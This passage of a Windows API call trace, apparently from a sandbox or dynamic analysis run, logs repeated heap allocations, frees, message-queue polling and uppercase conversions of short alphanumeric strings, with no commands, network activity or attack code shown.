(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.806] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0263.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.811] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.812] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.812] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.813] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0263.813] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.814] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.816] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.816] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.816] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0263.816] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.817] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 